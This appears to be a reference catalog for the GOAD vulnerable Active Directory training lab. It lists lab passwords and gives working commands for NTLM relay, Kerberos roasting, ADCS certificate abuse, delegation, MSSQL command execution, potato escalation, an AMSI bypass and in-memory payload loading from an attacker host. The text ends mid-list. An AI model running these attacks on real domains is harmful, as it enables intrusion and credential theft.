GOAD is a vulnerable Active Directory penetration testing lab by Mayfly (Orange Cyberdefense). This document catalogs all known vulnerabilities and attack paths in the lab.
Lab Architecture:
- Two forests, three domains:
sevenkingdoms.local(root) with childnorth.sevenkingdoms.local, andessos.local(separate forest) - Five Windows servers: DC01 (kingslanding), DC02 (winterfell, child DC), DC03 (meereen), SRV02 (castelblack), SRV03 (braavos)
- Bidirectional forest trust between
sevenkingdoms.localandessos.local - ADCS is installed on DC01 and SRV03; custom vulnerable certificate templates are published on DC03
GOAD Lab-Specific Vulnerable Configurations: These scheduled tasks and configurations are provisioned by Ansible roles to enable attack scenarios:
| Configuration | Server | User | Frequency | Source | Attack Enabled |
|---|---|---|---|---|---|
| Non-existent share connection | Winterfell | robb.stark | Every 2 minutes | ad/GOAD/scripts/responder.ps1 |
LLMNR/NBT-NS Poisoning |
| Non-existent share connection (to Meereen) | Winterfell | eddard.stark (Domain Admin of north) | Every 5 minutes | ad/GOAD/scripts/ntlm_relay.ps1 |
NTLM Relay |
| AS-REP Roastable account | dc02 (Winterfell) | brandon.stark | - | ad/GOAD/scripts/asrep_roasting.ps1 |
AS-REP Roasting (north) |
| AS-REP Roastable account | dc03 (Meereen) | missandei | - | ad/GOAD/scripts/asrep_roasting2.ps1 |
AS-REP Roasting (essos) |
| SMB Signing disabled | Winterfell | - | - | Server config | NTLM Relay target |
| IIS upload vulnerability | 192.168.56.22 (Castelblack) | - | - | IIS config | Web shell upload |
Key Vulnerable Accounts:
- robb.stark (north) - Local admin on Winterfell, password
sexywolfy(in rockyou.txt, NetNTLMv2 capture) - brandon.stark (north) - AS-REP roastable, password:
iseedeadpeople - missandei (essos) - AS-REP roastable, password:
fr3edom; also has GenericAll on khal.drogo - eddard.stark (north) - Domain Admin (north.sevenkingdoms.local), enables NTLM relay to domain compromise
- samwell.tarly (north) - Password in description field:
Heartsbane - hodor (north) - Password equals username:
hodor - jon.snow (north) - Kerberoastable (HTTP/thewall SPN), password:
iknownothing - khal.drogo (essos) - Local admin on Braavos, MSSQL sysadmin, GenericAll on viserys.targaryen and ESC4 template
- viserys.targaryen (essos) - ManageCA officer (ESC7 abuse path)
- Initial Access & Reconnaissance
- Credential Discovery
- Network Poisoning & Relay Attacks
- Kerberos Attacks
- Active Directory Certificate Services (ADCS) Vulnerabilities
- ACL Abuse & Permission Exploitation
- Delegation Attacks
- MSSQL Exploitation
- Privilege Escalation
- Lateral Movement
- Domain Trust Exploitation
- User-Level Attacks
- CVE Exploits
Vulnerability: NULL session access to SMB services
-
Affected Systems: WINTERFELL DC, various servers
-
Impact: Unauthenticated user enumeration, group discovery, share access
-
Tools: crackmapexec, enum4linux, rpcclient, smbclient
-
Exploitation:
cme smb 192.168.56.11 --users rpcclient -U "" -N <target> enumdomusers
Vulnerability: SMB signing not enforced
- Affected Systems: CASTELBLACK (SRV02), BRAAVOS (SRV03) — both are domain member servers running Windows Server. SMB signing is not required by default on member servers (only on DCs).
- Impact: Enables NTLM relay attacks
- Configuration Issues:
- CASTELBLACK: "signing enabled but not required"
- BRAAVOS: "message signing disabled (dangerous, but default)"
Vulnerability: Critical services accessible without security hardening
- Services Identified:
- DNS (port 53) - Domain enumeration
- Kerberos (port 88) - Ticket-based attacks
- LDAP (ports 389, 636, 3268, 3269) - Directory enumeration
- SMB (port 445) - File share and lateral movement
- RDP (port 3389) - Remote access entry points
- SQL Server (port 1433) - Database attacks
- WinRM (ports 5985-5986) - Remote command execution
Vulnerability: Internal DNS records exposed
- Tools: adidnsdump
- Impact: Discovery of internal hosts and services
Vulnerability: Plaintext passwords stored in user description attribute
- Affected Account: samwell.tarly
- Password: Heartsbane
- Discovery Method: LDAP enumeration, rpcclient
- Impact: Immediate authenticated access
Vulnerability: Insufficient password complexity requirements
- Configuration: Set by the
password_policyrole inansible/playbooks/ad-data.ymlagainst every DC (not domain-specific):ComplexityEnabled = false(no complexity requirements)LockoutThreshold = 5(5 failed attempts before lockout)MinPasswordLength = 5(5-character minimum)LockoutDuration = 5 minutes
- Impact: Enables password spraying with short, simple wordlists
Vulnerability: Users with passwords matching their usernames
- Discovered Accounts:
hodor:hodor(north.sevenkingdoms.local)
- Discovery Method: Password spraying
Vulnerability: Identical passwords used across trusted domains
- GOAD Context: The
sql_svcservice account exists in bothnorth.sevenkingdoms.localandessos.localwith the same password (YouWillNotKerboroast1ngMeeeeee). Compromising it in one domain (e.g., via Kerberoasting) yields the credential for the other. - Impact: Single credential pivots between forests
- Attack Path: Kerberoast
sql_svcin north → spray same hash/password againstessos.local
Vulnerability: Broadcast name resolution protocols enabled
-
GOAD Context: Winterfell runs a scheduled task as robb.stark every 2 minutes attempting to connect to a non-existent share (
\\Bravos\private), configured inad/GOAD/scripts/responder.ps1 -
Tool: Responder
-
Captured Credentials: robb.stark (NetNTLMv2 hash, crackable with rockyou.txt)
-
Exploitation:
# Start Responder on lab network interface responder -I eth0 -wrf # Wait up to 2 minutes for robb.stark's scheduled task # Capture NetNTLMv2 hash # Crack with hashcat hashcat -m 5600 robb_stark_hash.txt rockyou.txt # Or with John john robb_stark_hash.txt --wordlist=rockyou.txt
-
Result: robb.stark is local admin on Winterfell - enables further lateral movement
-
Impact: Credential capture from network authentication
Vulnerability: Systems accept NTLMv1 authentication
- Configuration: Responder with predictable challenge "1122334455667788"
- Impact: Hashes crackable via online services (crack.sh)
Vulnerability: Unsigned SMB on workstations
-
GOAD Context: Winterfell runs a scheduled task as eddard.stark (Domain Admin of north.sevenkingdoms.local) every 5 minutes connecting to a non-existent share on Meereen (
\\Meren\Private), configured inad/GOAD/scripts/ntlm_relay.ps1. Winterfell itself has SMB signing disabled, so the captured authentication can be relayed back to it. -
Find Unsigned SMB Hosts:
cme smb 192.168.56.0/24 --gen-relay-list relay_targets.txt
-
Attack Chain:
- Disable Responder's SMB/HTTP servers in
/usr/share/responder/Responder.conf - Start Responder to poison LLMNR/NBT-NS:
responder -I eth0 -v - Relay captured authentication to unsigned SMB hosts
- Disable Responder's SMB/HTTP servers in
-
Basic Relay (single command):
impacket-ntlmrelayx -t 192.168.56.11 -smb2support -c "whoami" -
SOCKS Proxy Relay (persistent access):
# Start relay with SOCKS impacket-ntlmrelayx -t 192.168.56.11 -smb2support -socks # In ntlmrelayx console, type 'socks' to see active sessions # Use proxychains with any tool proxychains cme smb 192.168.56.11 -d 'SEVENKINGDOMS' -u 'eddard.stark' -p '' --sam proxychains secretsdump.py 'SEVENKINGDOMS/eddard.stark'@192.168.56.11 proxychains lsassy -d SEVENKINGDOMS -u eddard.stark -p '' 192.168.56.11
-
Proxychains Config: Edit
/etc/proxychains4.conf- change port to 1080 (ntlmrelayx default) instead of 9050 (Tor default) -
Targets: Winterfell (SMB signing disabled)
-
Tools: ntlmrelayx, Responder, proxychains, secretsdump, lsassy
Vulnerability: LDAP signing not enforced + RBCD misconfiguration
- Attack Chain:
- Poison/coerce authentication
- Relay to LDAPS
- Create computer accounts with RBCD permissions
- Impersonate domain admin
- Tools: ntlmrelayx, rbcd.py
Vulnerability: Windows prefers IPv6 over IPv4 by default
- Attack Vector: Respond to DHCPv6 queries with malicious DNS server
- Impact: Redirect WPAD queries, capture credentials
- Tool: mitm6
Vulnerability: NTLM MIC removal bypass
- Attack Chain:
- Force DC authentication via PrinterBug/PetitPotam
- Relay SMB-to-LDAPS using remove-mic bypass
- Bypass signing requirements
- Impact: Domain compromise
Vulnerability: Users with "Do not require Kerberos preauthentication" flag
-
Affected Accounts:
- brandon.stark (north.sevenkingdoms.local) — cracked password:
iseedeadpeople - missandei (essos.local) — cracked password:
fr3edom
- brandon.stark (north.sevenkingdoms.local) — cracked password:
-
Discovery Methods:
- PowerView:
Get-DomainUser -PreauthNotRequired -Properties distinguishedname - AD Module:
Get-ADuser -filter * -properties DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq "True"} - Impacket:
GetNPUsers.py domain/ -usersfile users.txt -dc-ip DC_IP
- PowerView:
-
Exploitation:
# Linux - Impacket GetNPUsers.py north.sevenkingdoms.local/ -usersfile users.txt -dc-ip 192.168.56.11 GetNPUsers.py north.sevenkingdoms.local/brandon.stark -dc-ip 192.168.56.11 -no-pass -format hashcat # Windows - Rubeus (auto-discovers AS-REP roastable accounts) Rubeus.exe asreproast /format:hashcat # Crack the hash hashcat -m 18200 asrep_hashes.txt wordlist.txt john asrep_hashes.txt --wordlist=rockyou.txt
-
Note: Does not increase badpwdcount (no lockout risk)
-
Offensive Tip: With GenericWrite/GenericAll on a user, you can enable "Do not require Kerberos preauthentication" via userAccountControl modification, then AS-REP roast them
Vulnerability: Service accounts with SPNs set
-
Affected Accounts:
- jon.snow (HTTP/thewall.north.sevenkingdoms.local;
constrained_delegation_use_any.ps1adds CIFS SPN at provisioning time) — password:iknownothing - sansa.stark (HTTP/eyrie.north.sevenkingdoms.local) — password:
345ertdfg - sql_svc (MSSQLSvc/castelblack.north.sevenkingdoms.local; MSSQLSvc/braavos.essos.local in essos.local) — password:
YouWillNotKerboroast1ngMeeeeee
- jon.snow (HTTP/thewall.north.sevenkingdoms.local;
-
Tools: GetUserSPNs.py, hashcat (mode 13100)
-
Exploitation:
GetUserSPNs.py north.sevenkingdoms.local/user:password -dc-ip 192.168.56.11 -request hashcat -m 13100 tgs_hashes.txt wordlist.txt
Vulnerability: GenericWrite on user objects allows adding SPNs
- Attack Chain:
- Identify users with GenericWrite permissions
- Add SPN to target user account
- Request TGS ticket
- Crack offline
- Tools: bloodyAD, targetedKerberoast.py
Vulnerability: Username validation via Kerberos pre-authentication
- Method: Nmap krb5-enum-users script
- Error Responses:
- Invalid user:
KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN - Valid user:
KRB5KDC_ERR_PREAUTH_REQUIREDor TGT response
- Invalid user:
- Impact: Username enumeration without lockout
Vulnerability: Certificate templates allow requesters to specify Subject Alternative Name
-
Requirements:
- Template allows "Enrollee Supplies Subject"
- Client authentication EKU enabled
-
Exploitation:
certipy req -u user@domain -p password -ca CA-NAME -template TEMPLATE -upn administrator@domain
-
Impact: Request certificates for any user including domain admins
Vulnerability: Certificate templates with "Any Purpose" EKU or no EKU
- Impact: Certificate can be used for authentication, code signing, or any purpose
- Exploitation: Similar to ESC3, can be used for Certificate Request Agent abuse
Vulnerability: Templates with Certificate Request Agent EKU
- Attack Chain:
- Request agent certificate
- Use agent certificate to request certificates on behalf of other users
- Request certificate for domain admin
- Impact: Privilege escalation to domain admin
Vulnerability: GenericWrite/GenericAll permissions on certificate templates
-
Attack Chain:
- Identify writeable certificate templates
- Modify template settings to enable ESC1
- Request malicious certificate
-
Tools: Certipy, bloodyAD
-
Exploitation:
certipy template -u user@domain -p password -template TEMPLATE -save-old # Modify template settings certipy req -u user@domain -p password -ca CA-NAME -template TEMPLATE -upn admin@domain
Vulnerability: Compromise of Certificate Authority server or PKI AD objects
Golden Certificate Attack:
-
Requirements: CA server compromise (local admin on CA)
-
Attack Paths:
- SCHANNEL: Extract CA cert/key → forge certificate → LDAP shell
- PKINIT: Extract CA cert/key → forge certificate → Kerberos authentication
-
Tools: Certipy, SharpDPAPI
-
Exploitation:
# Backup CA certificate and private key certipy ca -backup -u user@domain -p password -ca CA-NAME # Forge administrator certificate certipy forge -ca-pfx ca.pfx -upn administrator@domain -subject 'CN=Administrator' # Authenticate using forged certificate certipy auth -pfx forged.pfx -dc-ip DC_IP
-
Impact: Forge certificates for any user, persistent domain compromise
PKI Object Access Control:
- Vulnerability: Excessive permissions on PKI container objects in AD
- Scenario: If SYSTEM (or compromised principal) has Full Control on parent domain's Public Key Services Container
- Attack Path: Child domain compromise → modify CA objects in parent domain → escalate to parent domain
- Impact: Cross-domain privilege escalation via ADCS infrastructure
Vulnerability: CA configured with EDITF_ATTRIBUTESUBJECTALTNAME2 flag
- Impact: Any template can be used to request certificates with arbitrary SANs
- Detection:
certipy find -vulnerable - Exploitation: Request certificate with
-upnflag for any template
Vulnerability: ManageCA privileges can be escalated to issue arbitrary certificates
-
Requirements: ManageCA privileges on Certificate Authority
-
Attack Chain:
-
Add yourself as officer (ManageCertificates permission):
certipy ca -ca 'CA-NAME' -add-officer attacker -u user@domain -p password -
Enable vulnerable template (e.g., SubCA):
certipy ca -ca 'CA-NAME' -enable-template SubCA -u user@domain -p password -
Request certificate with forged UPN (will be pending):
certipy req -u user@domain -p password -ca CA-NAME -template SubCA -upn administrator@domain
-
Issue the pending request using your officer privileges:
certipy ca -ca 'CA-NAME' -issue-request REQUEST_ID -u user@domain -p password -
Retrieve the issued certificate:
certipy req -u user@domain -p password -ca CA-NAME -retrieve REQUEST_ID
-
Authenticate as administrator:
certipy auth -pfx administrator.pfx -dc-ip DC_IP
-
-
Impact: Domain compromise through arbitrary certificate issuance
Vulnerability: Web enrollment service accepts NTLM authentication without EPA/signing
-
Attack Chain:
- Coerce DC authentication (PetitPotam, Coercer)
- Relay to ADCS web enrollment (HTTP/HTTPS)
- Request DC certificate
- Use certificate for authentication
-
Tools: ntlmrelayx, petitpotam, certipy
-
Exploitation:
ntlmrelayx.py -t http://adcs.domain/certsrv/certfnsh.asp -smb2support --adcs python3 PetitPotam.py attacker-ip dc-ip
-
Variant: Kerberos relay with self-coercion via DNS manipulation
Vulnerability: Certificate template with CT_FLAG_NO_SECURITY_EXTENSION (0x00080000) flag
- Prerequisites:
- GenericWrite on target account
msPKI-EnrollmentFlagcontainsCT_FLAG_NO_SECURITY_EXTENSIONStrongCertificateBindingEnforcement=1orCertificateMappingMethods=0x04
- Attack Chain:
-
Add shadow credentials to target to obtain their hash:
certipy shadow auto -u attacker@domain -p password -account target
-
Modify target's UPN to administrator:
# Using bloodyAD or similar bloodyAD -u attacker -p password -d domain set object target userPrincipalName -v administrator@domain
-
Request certificate using target's credentials:
certipy req -u target@domain -hashes :HASH -ca CA-NAME -template VulnerableTemplate
-
Restore original UPN
-
Authenticate with forged certificate
-
- Impact: Privilege escalation via certificate-based authentication
Vulnerability: Certificate mapping bypass allowing authentication as any user
- Case 1 (StrongCertificateBindingEnforcement=0):
- Modify target user's UPN to "administrator"
- Request certificate using target's hash
- Restore original UPN
- Authenticate as administrator with certificate
- Case 2 (CertificateMappingMethods=0x04):
- Modify target UPN to computer account format:
computername$@domain - Request certificate
- Restore UPN
- Authenticate via LDAP shell for computer account access
- Modify target UPN to computer account format:
- Requirements: GenericWrite on target account
- Tools: certipy, bloodyAD
Vulnerability: Encryption not enforced for ICPR (MS-ICPR) RPC requests
- Difference from ESC8: Uses RPC instead of HTTP for relay
- Requirements: CA allows RPC connections without encryption enforcement
- Attack Chain:
-
Set up RPC relay:
ntlmrelayx.py -t rpc://CA-IP -rpc-mode ICPR -icpr-ca-name CA-NAME --adcs
-
Coerce DC authentication via RPC:
coercer.py -u user -p password -d domain -t DC-IP -l attacker-ip --rpc-mode
-
Certificate issued for coerced principal
-
Authenticate using obtained certificate
-
- Impact: Domain compromise via RPC-based relay (bypasses HTTP-focused defenses)
Vulnerability: Certificate template with issuance policy linked to privileged group membership
-
Scenario: Template allows domain users to enroll, and the issued certificate grants membership in a privileged group (e.g., "greatmaster" → admin privileges)
-
Detection: Identify templates where enrollment grants extended rights or group memberships
-
Attack Chain:
-
Enumerate templates with dangerous issuance policies:
certipy find -vulnerable -u user@domain -p password
-
Request certificate from vulnerable template:
certipy req -u user@domain -p password -ca CA-NAME -template VulnerableTemplate
-
Authenticate and inherit group privileges:
certipy auth -pfx user.pfx -dc-ip DC_IP
-
-
Impact: Unintended privilege escalation through certificate issuance policies
Vulnerability: Write access to target's altSecurityIdentities attribute enables certificate mapping
-
Requirements: GenericWrite/WriteDacl on target user object
-
Attack Chain:
-
Create machine account with specific DNS hostname:
addcomputer.py -computer-name 'YOURPC$' -computer-pass 'Pass123' domain/user:password # Set dnsHostName for the computer account
-
Request Machine template certificate for your computer:
certipy req -u 'YOURPC$'@domain -p 'Pass123' -ca CA-NAME -template Machine
-
Calculate X509IssuerSerialNumber from certificate:
openssl x509 -in cert.pem -noout -issuer -serial # Format: X509:<I>DC=domain,DC=local,CN=CA-NAME<SR>SERIALNUMBER -
Modify target's altSecurityIdentities attribute:
# Using ldeep or similar LDAP tool ldeep ldap -u user -p password -d domain modify "CN=target,CN=Users,DC=domain,DC=local" \ add altSecurityIdentities "X509:<I>DC=domain,DC=local,CN=CA-NAME<SR>SERIAL"
-
Authenticate as target using your certificate via PKINIT:
certipy auth -pfx yourpc.pfx -dc-ip DC_IP -domain domain.local
-
-
Impact: Account takeover via certificate mapping without password knowledge
Vulnerability: Certificate Request Agent application policy enables delegation abuse
-
Requirements: Access to template with "Certificate Request Agent" EKU/application policy
-
Attack Chain:
-
Request certificate with Certificate Request Agent policy:
certipy req -u user@domain -p password -ca CA-NAME -template AgentTemplate
-
Use agent certificate to request certificate on behalf of administrator:
certipy req -u user@domain -p password -ca CA-NAME -template User \ -on-behalf-of 'domain\\administrator' -pfx agent.pfx -
Authenticate as administrator:
certipy auth -pfx administrator.pfx -dc-ip DC_IP
-
-
Impact: Privilege escalation to any user including domain admin
-
Patched: November 12, 2024
Vulnerability: Computer account DNS hostname spoofing
- Attack Chain:
- Create computer account (MAQ=10 by default)
- Set dNSHostName to match domain controller
- Request computer certificate
- Certificate issued for DC identity
- Authenticate as DC
- Tools: Certipy, impacket
- Impact: Domain compromise via DC impersonation
Vulnerability: GenericWrite/GenericAll on user/computer objects
-
Attack Chain:
- Add KeyCredentialLink to target account
- Generate PKINIT certificate
- Request TGT using certificate
- Authenticate as target
-
Tools: Pywhisker, Whisker
-
Exploitation:
pywhisker.py -d domain -u user -p password --target targetuser --action add
Vulnerability: Reset password permission on user objects
- Impact: Direct password reset without knowledge of current password
- Warning: Should not be used in real pentests (disruptive)
- Tools: bloodyAD, net rpc password
Vulnerability: Full write access to user object attributes
- Attack Vectors:
- Targeted Kerberoasting: Add SPN → request TGS → crack offline
- Shadow Credentials: Add msDS-KeyCredentialLink → PKINIT authentication
- LogonScript modification: Set scriptpath → execute code on logon
- ProfilePath manipulation: Force NetNTLMv2 authentication capture
- Tools: bloodyAD, PowerView, targetedKerberoast.py
Vulnerability: Modify access control entries on objects
-
Attack Chain:
- Identify WriteDacl permission
- Grant additional rights (e.g., FullControl)
- Execute further attacks
-
Tools: dacledit.py, PowerView
-
Exploitation:
dacledit.py -action write -rights FullControl -principal attacker -target-dn "CN=Target,DC=domain" domain/user:password
Vulnerability: Change ownership of group objects
- Attack Chain:
- Change group ownership to attacker-controlled account
- Modify DACL to grant full control
- Add members to privileged group
- Impact: Group membership manipulation
Vulnerability: Permission to add members to groups without approval
- Common Targets: Domain Admins, high-privilege groups
- Tools: net rpc group addmem, bloodyAD
Vulnerability: Complete control over user objects
- Capabilities:
- Password changes
- Shadow credentials
- Full account takeover
- Impact: Immediate privilege escalation
Vulnerability: Complete control over computer objects
- Attack Vectors:
- Shadow credentials for machine account
- RBCD configuration
- LAPS password reading (if configured)
- Impact: System-level access to target computer
Vulnerability: Write permissions on Group Policy Objects
- Attack Chain:
- Identify writable GPO
- Inject scheduled task executing arbitrary code as SYSTEM
- Wait for GPO refresh or force with
gpupdate
- Tools: SharpGPOAbuse, bloodyAD
- Impact: Code execution as SYSTEM on all computers in GPO scope
Vulnerability: Read access to ms-Mcs-AdmPwd attribute
- Requirements: Proper permissions on computer objects
- Tools: crackmapexec, ldapsearch, bloodyAD
- Impact: Local administrator password disclosure
Sevenkingdoms.local killchain:
Tywin
→ Jaime (ForceChangePassword)
→ Joffrey (GenericWrite/Kerberoasting)
→ Tyron (Shadow Credentials)
→ Small Council group (AddSelf)
→ DragonStone group (AddMember)
→ Kingsguard group (WriteOwner)
→ Stannis user (GenericAll)
→ Kingslanding DC (GenericAll on Computer/RBCD)
Vulnerability: Accounts configured with unconstrained delegation cache all TGTs
-
Default Configuration: All domain controllers have unconstrained delegation
-
Attack Chain:
- Identify unconstrained delegation accounts (BloodHound query:
unconstraineddelegation:true) - Compromise account with unconstrained delegation
- Coerce DC authentication (PetitPotam, Coercer, PrinterBug)
- Extract cached DC TGT from memory
- Use TGT for DCSync
- Identify unconstrained delegation accounts (BloodHound query:
-
Tools: Rubeus, klist, Coercer, secretsdump
-
Exploitation:
# Windows Rubeus.exe triage Rubeus.exe dump /luid:0x3e7 /service:krbtgt # Linux (after TGT extraction) export KRB5CCNAME=dc_tgt.ccache secretsdump.py -k dc.domain.local -just-dc
-
Impact: Full domain compromise via DCSync
Vulnerability: S4U2Self + S4U2Proxy allows impersonation
-
Configuration:
TRUSTED_TO_AUTH_FOR_DELEGATION+msDS-AllowedToDelegateTo -
Attack Chain:
- Identify accounts with constrained delegation
- Use S4U2Self to obtain forwardable ticket for any user
- Use S4U2Proxy to access target service
- Modify SPN if needed (
/altserviceflag)
-
Tools: Rubeus, getST.py
-
Exploitation:
# Linux getST.py -spn 'cifs/dc.domain.local' -impersonate administrator domain/delegated_user:password export KRB5CCNAME=administrator.ccache secretsdump.py -k dc.domain.local -just-dc
-
Key Feature: Can impersonate privileged users to access target SPNs
Vulnerability: Requires forwardable tickets but can be bypassed
- Limitation: Cannot perform S4U2Self (needs forwardable tickets)
- Bypass: RBCD workaround
- Create intermediary computer account
- Configure RBCD on intermediary
- Execute S4U2Self/S4U2Proxy chain
- Modify service names as needed
- Impact: Similar to standard constrained delegation
Vulnerability: Write access to msDS-AllowedToActOnBehalfOfOtherIdentity
-
Requirements:
- GenericAll/GenericWrite on computer object
- Ability to create machine accounts (MAQ=10 by default)
-
Attack Chain:
- Create attacker-controlled computer account
- Set
msDS-AllowedToActOnBehalfOfOtherIdentityon target - Perform S4U2Self to get forwardable ticket
- Perform S4U2Proxy to impersonate admin on target
- Gain admin access to target system
-
Tools: rbcd.py, addcomputer.py, getST.py
-
Exploitation:
# Create computer account addcomputer.py -computer-name 'EVILPC$' -computer-pass 'P@ssw0rd' domain/user:password # Configure RBCD rbcd.py -delegate-from 'EVILPC$' -delegate-to 'TARGET$' -action write domain/user:password # Request tickets getST.py -spn 'cifs/target.domain.local' -impersonate administrator -dc-ip 192.168.56.11 domain/'EVILPC$':'P@ssw0rd' # Use ticket export KRB5CCNAME=administrator.ccache secretsdump.py -k target.domain.local
-
Impact: Administrator access to target computers
Vulnerability: Default setting allows domain users to create 10 computer objects
- Default Value:
ms-DS-MachineAccountQuota = 10 - Impact: Enables RBCD, DNS spoofing, and Kerberos relay attacks
- Discovery:
crackmapexec ldap dc.domain.local -u user -p password -M maq
Vulnerability: Users with impersonation privileges can assume identity of other logins
-
GOAD Context (castelblack / SRV02):
NORTH\samwell.tarlycan impersonate thesalogin → instance sysadminNORTH\brandon.starkcan impersonateNORTH\jon.snow(who is a sysadmin) → indirect path to sysadmin
-
GOAD Context (braavos / SRV03):
ESSOS\jorah.mormontcan impersonate thesalogin → instance sysadmin
-
Attack Chain:
- Enumerate impersonation permissions
- Execute commands as privileged login
- Enable xp_cmdshell if needed
- Execute OS commands
-
Tools: mssqlclient.py, PowerUpSQL
-
Exploitation:
EXECUTE AS LOGIN = 'sa'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami';
Vulnerability: Database-level impersonation of dbo user
- Requirements: Database "trustworthy" property enabled
- GOAD Context (castelblack / SRV02):
NORTH\arya.starkcan impersonatedboin bothmasterandmsdbdatabases - Impact: Elevated database privileges
Vulnerability: MSSQL can coerce NTLM authentication
- Methods:
xp_dirtree '\\attacker-ip\share'xp_fileexist '\\attacker-ip\share'xp_subdirs '\\attacker-ip\share'
- Impact: Capture machine account NetNTLM hash for relay attacks
- Tools: Responder, ntlmrelayx
Vulnerability: SQL Server links between database instances
-
GOAD Context: Bidirectional cross-forest linked-server chain between castelblack and braavos:
castelblack.north.sevenkingdoms.local→BRAAVOS(login mappingNORTH\jon.snow→ remotesa, passwordsa_P@ssw0rd!Ess0s)braavos.essos.local→CASTELBLACK(login mappingESSOS\khal.drogo→ remotesa, passwordSup1_sa_P@ssw0rd!)- See
mssql.linked_serversblocks inad/GOAD/data/config.jsonfor canonical mappings.
-
Attack: Chain queries across linked servers to pivot between systems (and across the forest trust)
-
Exploitation:
SELECT * FROM OPENQUERY([LINKED_SERVER], 'SELECT SYSTEM_USER'); EXEC ('xp_cmdshell ''whoami''') AT [LINKED_SERVER];
-
Impact: Command execution across multiple database servers, cross-forest pivoting
Vulnerability: Extended stored procedure for OS command execution
- Requirements: Administrative access or impersonation
- Default: Usually disabled, but can be enabled
- Impact: Direct operating system command execution as SQL Server service account
Vulnerability: Database property determining impersonation scope
- Risk: Allows database-level impersonation to escalate to instance-level
- Detection:
SELECT name, is_trustworthy_on FROM sys.databases;
Vulnerability: Service accounts (IIS, MSSQL) have SeImpersonate privilege by default
-
Tools: PrintSpoofer, SweetPotato, BadPotato, JuicyPotato, RoguePotato, GodPotato
-
Exploitation Techniques:
-
PrintSpoofer: Abuses the Print Spooler service to impersonate SYSTEM
PrintSpoofer.exe -i -c cmd PrintSpoofer.exe -c "C:\path\to\reverse_shell.bat"
-
SweetPotato: Unified "potato" technique that defaults to PrintSpoofer
- Creates temporary directory and loads binary via
Assembly.Load()into PowerShell - Executes batch file containing reverse shell commands
# In-memory loading via PowerSharpPack Invoke-SweetPotato -Command "C:\temp\shell.bat"
- Creates temporary directory and loads binary via
-
BadPotato: Alternative when other potatoes are detected
- Requires AMSI bypass before execution due to Defender detection
- Can be loaded via PowerSharpPack wrapper
# AMSI bypass required first Invoke-BadPotato -Command "cmd /c whoami"
-
-
Common Trigger: Web shells on IIS provide initial SeImpersonate context
-
Impact: Escalation from service account (IIS AppPool, SQL Service) to SYSTEM privileges
Vulnerability: Kerberos relay when LDAP signing not enforced
-
Requirements Verification:
- LDAP Signing: Check with CME module:
cme ldap DC_IP -u user -p pass -M ldap-signing - Machine Account Quota (MAQ):
cme ldap DC_IP -u user -p pass -M maq(default: 10)
- LDAP Signing: Check with CME module:
-
Attack Chain:
-
Add Computer Account:
addcomputer.py -computer-name 'YOURPC$' -computer-pass 'Password123' domain/user:password
-
Extract Machine Account SID:
pywerview get-netcomputer -u user -p password -d domain --computername YOURPC
-
Launch KrbRelay with CLSID:
# Target LDAP service with specific CLSID KrbRelay.exe -spn ldap/DC.domain.local -clsid {CLSID} -rbcd YOURPC$ -
Configure RBCD: KrbRelay automatically sets
msDS-AllowedToActOnBehalfOfOtherIdentity -
Request Impersonated Ticket:
# Using Impacket getST.py -spn cifs/target.domain.local -impersonate administrator domain/'YOURPC$':'Password123' # Using Rubeus (Windows) Rubeus.exe hash /password:Password123 /user:YOURPC$ /domain:domain.local Rubeus.exe s4u /user:YOURPC$ /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target /ptt
-
Execute Commands:
wmiexec.py -k -no-pass domain/administrator@target.domain.local
-
-
Tools: KrbRelayUp (all-in-one), KrbRelay, Rubeus, Impacket
-
Defender Note: KrbRelay may evade Defender detection (as of writeup date)
-
Impact: System-level privilege escalation from local service account
Vulnerability: PowerShell AMSI can be bypassed using multi-stage techniques
-
Two-Stage Approach:
- PowerShell Level: Modified reflection methods with string fragmentation to avoid signature detection
- Fragment known signatures:
"Am'+'siUt'+'ils"instead of"AmsiUtils" - Use reflection to access internal .NET methods
- Fragment known signatures:
- .NET Level: Patch amsi.dll's
AmsiScanBufferfunction using kernel32 API calls- Use
GetProcAddressto locate the function - Modify memory protection with
VirtualProtect - Patch the function to return clean scan results
- Use
- PowerShell Level: Modified reflection methods with string fragmentation to avoid signature detection
-
Common Bypass Patterns:
# Example string fragmentation pattern $a = 'Sy'+'st'+'em.Ma'+'nag'+'ement.Aut'+'omtic'+'on.Am'+'siUt'+'ils'
-
Impact: Execute malicious PowerShell and load .NET assemblies without AV detection
-
Note: Modern EDR may still detect behavioral patterns even with AMSI bypass
Vulnerability: Lack of EDR/AV monitoring of .NET assembly loading
-
Philosophy: "The disk is lava" - avoid writing files to disk to evade file-based detection
-
Method: Load .NET assemblies directly into memory using
Assembly.Load()or reflection -
Tools & Techniques:
- PowerSharpPack: Pre-compiled .NET tools wrapped with public class/method interfaces for easy PowerShell invocation
- Invoke-SharpLoader: Generic loader for .NET assemblies
- WinPEAS: Enumeration tool loaded entirely in memory via
Assembly.Load()from HTTP-served payloads
-
Example Loading Pattern:
# Download and load assembly in memory $bytes = (New-Object Net.WebClient).DownloadData('http://attacker/tool.exe') [System.Reflection.Assembly]::Load($bytes) [Namespace.Class]::Method()
-
CheckPort.exe: Verify available ports for reverse shells before exploitation
-
Impact: Defense evasion - bypasses file-based AV/EDR detection
Vulnerability: IIS application with file upload functionality
- Target in GOAD: 192.168.56.22 (IIS server with vulnerable upload functionality)
- Example: Simple ASP.NET application allowing unrestricted file uploads without extension validation
- Exploitation:
-
Upload ASPX web shell via vulnerable upload form
# Common web shells: cmd.aspx, simple-backdoor.aspx -
Access web shell via browser at uploaded path
http://192.168.56.22/uploads/shell.aspx -
Execute commands as IIS AppPool identity (has SeImpersonate)
-
Chain with potato exploits for SYSTEM
-
- Post-Upload Attack Path:
- Verify privileges:
whoami /priv(look for SeImpersonatePrivilege) - Bypass AMSI if using PowerShell
- Load exploitation tools in memory
- Execute SweetPotato/PrintSpoofer for SYSTEM
- Verify privileges:
- Impact: Initial access → SeImpersonate → SYSTEM privileges
Vulnerability: UAC bypass techniques
- Impact: Elevation from medium to high integrity process
- Tools: SCMUACBypass
Method: Extract NT hashes from C:\Windows\System32\config\SAM
-
Requirements: Local admin access, SYSTEM/SAM hives
-
Tools: secretsdump.py, reg save
-
Exploitation:
secretsdump.py -sam SAM -system SYSTEM LOCAL
Method: Extract from HKLM\SECURITY registry hive
- Data Retrieved:
- Cached domain logon information (DCC2 hashes)
